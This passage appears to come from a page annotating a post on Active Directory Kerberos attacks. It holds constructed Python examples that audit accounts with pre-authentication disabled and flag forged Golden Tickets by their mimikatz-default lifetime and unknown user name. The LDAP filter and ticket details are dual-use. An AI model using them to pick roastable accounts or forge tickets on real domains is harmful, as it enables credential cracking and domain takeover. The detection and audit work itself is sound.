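The Account/Finding record shapes and audit_preauth() are this example's own.
"""
from dataclasses import dataclass

# userAccountControl flag bits (Microsoft-defined values).
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000      # 4194304 in the post's LDAP filter

LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators"}


def preauth_disabled_filter() -> str:
    """The post's LDAP filter, restricted to user objects."""
    return ("(&(objectCategory=person)(objectClass=user)"
            f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={UF_DONT_REQUIRE_PREAUTH}))")


@dataclass
class Account:
    sam_account_name: str
    user_account_control: int
    member_of: tuple = ()


@dataclass
class Finding:
    account: str
    severity: str
    detail: str


def audit_preauth(accounts) -> list:
    """Flag accounts with pre-authentication disabled; rank by what a cracked password would give."""
    findings = []
    for acct in accounts:
        uac = acct.user_account_control
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue                      # pre-auth required: one AS-REQ leaks nothing crackable
        if uac & UF_ACCOUNTDISABLE:
            # the KDC refuses disabled accounts, so nothing to roast; still worth cleaning up
            findings.append(Finding(acct.sam_account_name, "info", "pre-auth disabled on a disabled account"))
            continue
        privileged = sorted(set(acct.member_of) & PRIVILEGED_GROUPS)
        detail = "offline password cracking possible from a single AS-REP"
        if privileged:
            detail += "; member of " + ", ".join(privileged)
        if uac & UF_DONT_EXPIRE_PASSWD:
            detail += "; password never expires"
        findings.append(Finding(acct.sam_account_name, "high" if privileged else "medium", detail))
    return findings


# Constructed sample directory export (not real accounts).
SAMPLE_ACCOUNTS = [
    Account("administrator", UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD, ("Domain Admins",)),
    Account("svc_backup", UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD | UF_DONT_REQUIRE_PREAUTH),
    Account("helpdesk1", UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH, ("Domain Admins",)),
    Account("intern", UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH),
    Account("old_vendor", UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH),
]

if __name__ == "__main__":
    print(preauth_disabled_filter())
    for f in audit_preauth(SAMPLE_ACCOUNTS):
        print(f"[{f.severity}] {f.account}: {f.detail}")
```

The remediation for every non-info finding is the same: clear the "Do not require Kerberos preauthentication" flag and rotate the account's password.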
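A check that flags tickets with the properties the Golden Ticket section describes (a 10-year lifetime from the mimikatz default, and a user name the KDC never verified), written from the detection side as an added example that is not code from the original post. The Tgt record, check_tgt() and the sample tickets are constructed; the limits assume the default Windows Kerberos policy (10-hour user ticket, 7-day renewal), which a domain may have changed.

```python
"""Flag TGTs with the properties the Golden Ticket section describes.

Added example for this page, not code from the original post. The Tgt record,
check_tgt() and the sample tickets are constructed for the demonstration; the
limits assume the default Windows Kerberos policy (10-hour user ticket,
7-day renewal).
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

MAX_TGT_LIFETIME = timedelta(hours=10)   # default "Maximum lifetime for user ticket"
MAX_RENEWAL = timedelta(days=7)          # default "Maximum lifetime for user ticket renewal"


@dataclass
class Tgt:
    client_name: str        # the user the ticket claims to represent
    start: datetime
    end: datetime
    renew_until: datetime


def check_tgt(ticket: Tgt, known_users) -> list:
    """Return the reasons this TGT looks forged; an empty list means nothing unusual."""
    reasons = []
    lifetime = ticket.end - ticket.start
    if lifetime > MAX_TGT_LIFETIME:
        # mimikatz kerberos::golden writes a 10-year ticket unless /endin is given
        reasons.append(f"lifetime {lifetime} exceeds the policy maximum of {MAX_TGT_LIFETIME}")
    if ticket.renew_until - ticket.start > MAX_RENEWAL:
        reasons.append(f"renewable until {ticket.renew_until:%Y-%m-%d}, beyond the {MAX_RENEWAL.days}-day policy")
    if ticket.client_name.lower() not in {u.lower() for u in known_users}:
        # per the post, the KDC does not check the account named in a TGT for its first
        # 20 minutes, so a made-up name only shows up when compared with the directory
        reasons.append(f"client name '{ticket.client_name}' does not exist in the directory")
    return reasons


# Constructed samples: a KDC-issued ticket and one forged with mimikatz defaults.
KNOWN_USERS = ["administrator", "hack", "k0uaz"]
ISSUED = datetime(2023, 5, 1, 9, 0)
LEGIT = Tgt("hack", ISSUED, ISSUED + timedelta(hours=10), ISSUED + timedelta(days=7))
FORGED = Tgt("fakeadmin", ISSUED, ISSUED.replace(year=2033), ISSUED.replace(year=2033))

if __name__ == "__main__":
    for label, t in (("legit", LEGIT), ("forged", FORGED)):
        print(label, check_tgt(t, KNOWN_USERS) or ["ok"])
```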